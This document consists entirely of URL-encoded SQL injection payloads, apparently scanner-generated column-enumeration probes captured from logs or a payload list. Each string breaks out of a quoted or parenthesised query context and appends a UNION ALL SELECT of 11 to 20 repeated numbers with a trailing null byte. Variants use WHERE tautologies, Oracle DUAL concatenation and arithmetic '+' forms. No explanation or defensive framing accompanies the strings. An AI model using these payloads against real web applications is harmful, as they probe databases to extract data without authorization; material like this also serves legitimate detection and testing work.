-5404%22%29%20UNION%20ALL%20SELECT%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%00%20AND%20%28%22jnoL%22%20LIKE%20%22jnoL -3779%22%29%20UNION%20ALL%20SELECT%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%2C%202470%00%20AND%20%28%22ukzN%22%20LIKE%20%22ukzN -8443%22%29%20UNION%20ALL%20SELECT%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%00%20AND%20%28%22bPsf%22%20LIKE%20%22bPsf -8806%22%29%20UNION%20ALL%20SELECT%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%2C%205170%00%20AND%20%28%22qlpZ%22%20LIKE%20%22qlpZ -2675%22%29%20UNION%20ALL%20SELECT%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%00%20AND%20%28%22ayCa%22%20LIKE%20%22ayCa -7967%22%29%29%20UNION%20ALL%20SELECT%209261%2C%209261%2C%209261%2C%209261%2C%209261%2C%209261%2C%209261%2C%209261%2C%209261%2C%209261%2C%209261%00%20AND%20%28%28%22IGsV%22%20LIKE%20%22IGsV -4859%22%29%29%20UNION%20ALL%20SELECT%203224%2C%203224%2C%203224%2C%203224%2C%203224%2C%203224%2C%203224%2C%203224%2C%203224%2C%203224%2C%203224%2C%203224%00%20AND%20%28%28%22yaDz%22%20LIKE%20%22yaDz -2086%22%29%29%20UNION%20ALL%20SELECT%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%2C%202864%00%20AND%20%28%28%22cxuB%22%20LIKE%20%22cxuB -4395%22%29%29%20UNION%20ALL%20SELECT%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%2C%205356%00%20AND%20%28%28%22BRIX%22%20LIKE%20%22BRIX -6320%22%29%29%20UNION%20ALL%20SELECT%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%2C%203656%00%20AND%20%28%28%22GIaH%22%20LIKE%20%22GIaH -1467%22%29%29%20UNION%20ALL%20SELECT%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%2C%205395%00%20AND%20%28%28%22mDoj%22%20LIKE%20%22mDoj -7278%22%29%29%20UNION%20ALL%20SELECT%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%2C%206900%00%20AND%20%28%28%22yCye%22%20LIKE%20%22yCye -1437%22%29%29%20UNION%20ALL%20SELECT%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%2C%206257%00%20AND%20%28%28%22pHhF%22%20LIKE%20%22pHhF -8886%22%29%29%20UNION%20ALL%20SELECT%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%2C%205644%00%20AND%20%28%28%22EIaW%22%20LIKE%20%22EIaW -5929%22%29%29%20UNION%20ALL%20SELECT%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%00%20AND%20%28%28%22jVYV%22%20LIKE%20%22jVYV -5185%22%29%29%29%20UNION%20ALL%20SELECT%206452%2C%206452%2C%206452%2C%206452%2C%206452%2C%206452%2C%206452%2C%206452%2C%206452%2C%206452%2C%206452%00%20AND%20%28%28%28%22SeZd%22%20LIKE%20%22SeZd -3462%22%29%29%29%20UNION%20ALL%20SELECT%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%00%20AND%20%28%28%28%22LCNZ%22%20LIKE%20%22LCNZ -9456%22%29%29%29%20UNION%20ALL%20SELECT%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%00%20AND%20%28%28%28%22cxrp%22%20LIKE%20%22cxrp -5386%22%29%29%29%20UNION%20ALL%20SELECT%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%00%20AND%20%28%28%28%22ZpwM%22%20LIKE%20%22ZpwM -2486%22%29%29%29%20UNION%20ALL%20SELECT%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%2C%206267%00%20AND%20%28%28%28%22Lvsr%22%20LIKE%20%22Lvsr -2961%22%29%29%29%20UNION%20ALL%20SELECT%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%2C%207278%00%20AND%20%28%28%28%22byPg%22%20LIKE%20%22byPg -1737%22%29%29%29%20UNION%20ALL%20SELECT%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%00%20AND%20%28%28%28%22MuwP%22%20LIKE%20%22MuwP -6743%22%29%29%29%20UNION%20ALL%20SELECT%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%2C%202733%00%20AND%20%28%28%28%22UwEF%22%20LIKE%20%22UwEF -7187%22%29%29%29%20UNION%20ALL%20SELECT%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%00%20AND%20%28%28%28%22lvNk%22%20LIKE%20%22lvNk -7478%22%29%29%29%20UNION%20ALL%20SELECT%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%2C%206046%00%20AND%20%28%28%28%22wEvW%22%20LIKE%20%22wEvW -8579%22%20UNION%20ALL%20SELECT%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%00%20AND%20%22aljs%22%20LIKE%20%22aljs -1744%22%20UNION%20ALL%20SELECT%202720%2C%202720%2C%202720%2C%202720%2C%202720%2C%202720%2C%202720%2C%202720%2C%202720%2C%202720%2C%202720%2C%202720%00%20AND%20%22YFQV%22%20LIKE%20%22YFQV -9838%22%20UNION%20ALL%20SELECT%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%00%20AND%20%22pJdZ%22%20LIKE%20%22pJdZ -9040%22%20UNION%20ALL%20SELECT%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%00%20AND%20%22RUHw%22%20LIKE%20%22RUHw -8498%22%20UNION%20ALL%20SELECT%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%00%20AND%20%22MGIy%22%20LIKE%20%22MGIy -4136%22%20UNION%20ALL%20SELECT%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%2C%209158%00%20AND%20%22cBiY%22%20LIKE%20%22cBiY -1826%22%20UNION%20ALL%20SELECT%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%00%20AND%20%22iJrS%22%20LIKE%20%22iJrS -8867%22%20UNION%20ALL%20SELECT%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%00%20AND%20%22BNNF%22%20LIKE%20%22BNNF -9285%22%20UNION%20ALL%20SELECT%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%2C%205341%00%20AND%20%22sEJR%22%20LIKE%20%22sEJR -4800%22%20UNION%20ALL%20SELECT%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%00%20AND%20%22drnP%22%20LIKE%20%22drnP -4761%29%20WHERE%205317%3D5317%20UNION%20ALL%20SELECT%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%00 -1111%29%20WHERE%208629%3D8629%20UNION%20ALL%20SELECT%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%00 -6924%29%20WHERE%205134%3D5134%20UNION%20ALL%20SELECT%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%00 -4651%29%20WHERE%203704%3D3704%20UNION%20ALL%20SELECT%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%00 -7479%29%20WHERE%205482%3D5482%20UNION%20ALL%20SELECT%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%2C%205482%00 -4024%29%20WHERE%209113%3D9113%20UNION%20ALL%20SELECT%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%00 -1575%29%20WHERE%204424%3D4424%20UNION%20ALL%20SELECT%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%00 -8642%29%20WHERE%206115%3D6115%20UNION%20ALL%20SELECT%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%2C%206115%00 -1854%29%20WHERE%209751%3D9751%20UNION%20ALL%20SELECT%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%00 -8871%29%20WHERE%204536%3D4536%20UNION%20ALL%20SELECT%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%00 -9445%27%29%20WHERE%209652%3D9652%20UNION%20ALL%20SELECT%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%00 -8066%27%29%20WHERE%204943%3D4943%20UNION%20ALL%20SELECT%204943%2C%204943%2C%204943%2C%204943%2C%204943%2C%204943%2C%204943%2C%204943%2C%204943%2C%204943%2C%204943%2C%204943%00 -2037%27%29%20WHERE%201835%3D1835%20UNION%20ALL%20SELECT%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%00 -2170%27%29%20WHERE%202438%3D2438%20UNION%20ALL%20SELECT%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%00 -8358%27%29%20WHERE%201727%3D1727%20UNION%20ALL%20SELECT%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%2C%201727%00 -9595%27%29%20WHERE%202181%3D2181%20UNION%20ALL%20SELECT%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%2C%202181%00 -6399%27%29%20WHERE%205497%3D5497%20UNION%20ALL%20SELECT%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%2C%205497%00 -3270%27%29%20WHERE%206026%3D6026%20UNION%20ALL%20SELECT%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%00 -8622%27%29%20WHERE%207142%3D7142%20UNION%20ALL%20SELECT%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%2C%207142%00 -4258%27%29%20WHERE%205850%3D5850%20UNION%20ALL%20SELECT%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%00 -3276%27%20WHERE%204307%3D4307%20UNION%20ALL%20SELECT%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%00 -3677%27%20WHERE%206503%3D6503%20UNION%20ALL%20SELECT%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%00 -4135%27%20WHERE%208932%3D8932%20UNION%20ALL%20SELECT%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%2C%208932%00 -9819%27%20WHERE%203377%3D3377%20UNION%20ALL%20SELECT%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%00 -7515%27%20WHERE%203702%3D3702%20UNION%20ALL%20SELECT%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%00 -7964%27%20WHERE%206733%3D6733%20UNION%20ALL%20SELECT%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%2C%206733%00 -9082%27%20WHERE%205111%3D5111%20UNION%20ALL%20SELECT%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%2C%205111%00 -5649%27%20WHERE%202032%3D2032%20UNION%20ALL%20SELECT%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%00 -4265%27%20WHERE%203548%3D3548%20UNION%20ALL%20SELECT%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%00 -6830%27%20WHERE%203914%3D3914%20UNION%20ALL%20SELECT%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%00 -8070%22%20WHERE%202901%3D2901%20UNION%20ALL%20SELECT%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%00 -6487%22%20WHERE%201783%3D1783%20UNION%20ALL%20SELECT%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%00 -9583%22%20WHERE%204484%3D4484%20UNION%20ALL%20SELECT%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%00 -7193%22%20WHERE%208620%3D8620%20UNION%20ALL%20SELECT%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%00 -6591%22%20WHERE%208407%3D8407%20UNION%20ALL%20SELECT%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%2C%208407%00 -6369%22%20WHERE%201855%3D1855%20UNION%20ALL%20SELECT%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%00 -9564%22%20WHERE%201087%3D1087%20UNION%20ALL%20SELECT%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%00 -2329%22%20WHERE%205472%3D5472%20UNION%20ALL%20SELECT%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%2C%205472%00 -9180%22%20WHERE%201032%3D1032%20UNION%20ALL%20SELECT%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%2C%201032%00 -1554%22%20WHERE%209755%3D9755%20UNION%20ALL%20SELECT%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%00 -2810%27%20%7C%7C%20%28SELECT%205694%20FROM%20DUAL%20WHERE%206349%3D6349%20UNION%20ALL%20SELECT%206349%2C%206349%2C%206349%2C%206349%2C%206349%2C%206349%2C%206349%2C%206349%2C%206349%2C%206349%2C%206349%00%20%29%20%7C%7C%20%27 -5539%27%20%7C%7C%20%28SELECT%206935%20FROM%20DUAL%20WHERE%206566%3D6566%20UNION%20ALL%20SELECT%206566%2C%206566%2C%206566%2C%206566%2C%206566%2C%206566%2C%206566%2C%206566%2C%206566%2C%206566%2C%206566%2C%206566%00%20%29%20%7C%7C%20%27 -2011%27%20%7C%7C%20%28SELECT%205318%20FROM%20DUAL%20WHERE%201546%3D1546%20UNION%20ALL%20SELECT%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%00%20%29%20%7C%7C%20%27 -4627%27%20%7C%7C%20%28SELECT%204045%20FROM%20DUAL%20WHERE%209623%3D9623%20UNION%20ALL%20SELECT%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%2C%209623%00%20%29%20%7C%7C%20%27 -4905%27%20%7C%7C%20%28SELECT%202518%20FROM%20DUAL%20WHERE%209354%3D9354%20UNION%20ALL%20SELECT%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%2C%209354%00%20%29%20%7C%7C%20%27 -8377%27%20%7C%7C%20%28SELECT%209938%20FROM%20DUAL%20WHERE%208330%3D8330%20UNION%20ALL%20SELECT%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%00%20%29%20%7C%7C%20%27 -5600%27%20%7C%7C%20%28SELECT%202045%20FROM%20DUAL%20WHERE%208697%3D8697%20UNION%20ALL%20SELECT%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%00%20%29%20%7C%7C%20%27 -3537%27%20%7C%7C%20%28SELECT%201406%20FROM%20DUAL%20WHERE%208312%3D8312%20UNION%20ALL%20SELECT%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%00%20%29%20%7C%7C%20%27 -1873%27%20%7C%7C%20%28SELECT%206093%20FROM%20DUAL%20WHERE%204746%3D4746%20UNION%20ALL%20SELECT%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%00%20%29%20%7C%7C%20%27 -9911%27%20%7C%7C%20%28SELECT%207417%20FROM%20DUAL%20WHERE%202421%3D2421%20UNION%20ALL%20SELECT%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%2C%202421%00%20%29%20%7C%7C%20%27 -3372%27%20%7C%7C%20%28SELECT%205933%20WHERE%204988%3D4988%20UNION%20ALL%20SELECT%204988%2C%204988%2C%204988%2C%204988%2C%204988%2C%204988%2C%204988%2C%204988%2C%204988%2C%204988%2C%204988%00%20%29%20%7C%7C%20%27 -3770%27%20%7C%7C%20%28SELECT%207056%20WHERE%209008%3D9008%20UNION%20ALL%20SELECT%209008%2C%209008%2C%209008%2C%209008%2C%209008%2C%209008%2C%209008%2C%209008%2C%209008%2C%209008%2C%209008%2C%209008%00%20%29%20%7C%7C%20%27 -8411%27%20%7C%7C%20%28SELECT%209047%20WHERE%202249%3D2249%20UNION%20ALL%20SELECT%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%00%20%29%20%7C%7C%20%27 -9834%27%20%7C%7C%20%28SELECT%207638%20WHERE%203370%3D3370%20UNION%20ALL%20SELECT%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%00%20%29%20%7C%7C%20%27 -5485%27%20%7C%7C%20%28SELECT%207468%20WHERE%205817%3D5817%20UNION%20ALL%20SELECT%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%2C%205817%00%20%29%20%7C%7C%20%27 -2155%27%20%7C%7C%20%28SELECT%202146%20WHERE%207346%3D7346%20UNION%20ALL%20SELECT%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%2C%207346%00%20%29%20%7C%7C%20%27 -2307%27%20%7C%7C%20%28SELECT%202483%20WHERE%203768%3D3768%20UNION%20ALL%20SELECT%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%2C%203768%00%20%29%20%7C%7C%20%27 -6019%27%20%7C%7C%20%28SELECT%203461%20WHERE%209497%3D9497%20UNION%20ALL%20SELECT%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%00%20%29%20%7C%7C%20%27 -8820%27%20%7C%7C%20%28SELECT%203254%20WHERE%208298%3D8298%20UNION%20ALL%20SELECT%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%2C%208298%00%20%29%20%7C%7C%20%27 -5941%27%20%7C%7C%20%28SELECT%204280%20WHERE%208979%3D8979%20UNION%20ALL%20SELECT%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%2C%208979%00%20%29%20%7C%7C%20%27 -2133%20%2B%20%28SELECT%203286%20FROM%20DUAL%20WHERE%203098%3D3098%20UNION%20ALL%20SELECT%203098%2C%203098%2C%203098%2C%203098%2C%203098%2C%203098%2C%203098%2C%203098%2C%203098%2C%203098%2C%203098%00%20%29 -8878%20%2B%20%28SELECT%208540%20FROM%20DUAL%20WHERE%201883%3D1883%20UNION%20ALL%20SELECT%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%00%20%29 -9903%20%2B%20%28SELECT%209998%20FROM%20DUAL%20WHERE%202046%3D2046%20UNION%20ALL%20SELECT%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046%00%20%29 -5366%20%2B%20%28SELECT%209995%20FROM%20DUAL%20WHERE%201272%3D1272%20UNION%20ALL%20SELECT%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%00%20%29 -9204%20%2B%20%28SELECT%202162%20FROM%20DUAL%20WHERE%201883%3D1883%20UNION%20ALL%20SELECT%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%00%20%29 -9291%20%2B%20%28SELECT%201348%20FROM%20DUAL%20WHERE%201138%3D1138%20UNION%20ALL%20SELECT%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%00%20%29 -3328%20%2B%20%28SELECT%209509%20FROM%20DUAL%20WHERE%201431%3D1431%20UNION%20ALL%20SELECT%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%2C%201431%00%20%29 -2497%20%2B%20%28SELECT%203543%20FROM%20DUAL%20WHERE%208295%3D8295%20UNION%20ALL%20SELECT%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%00%20%29 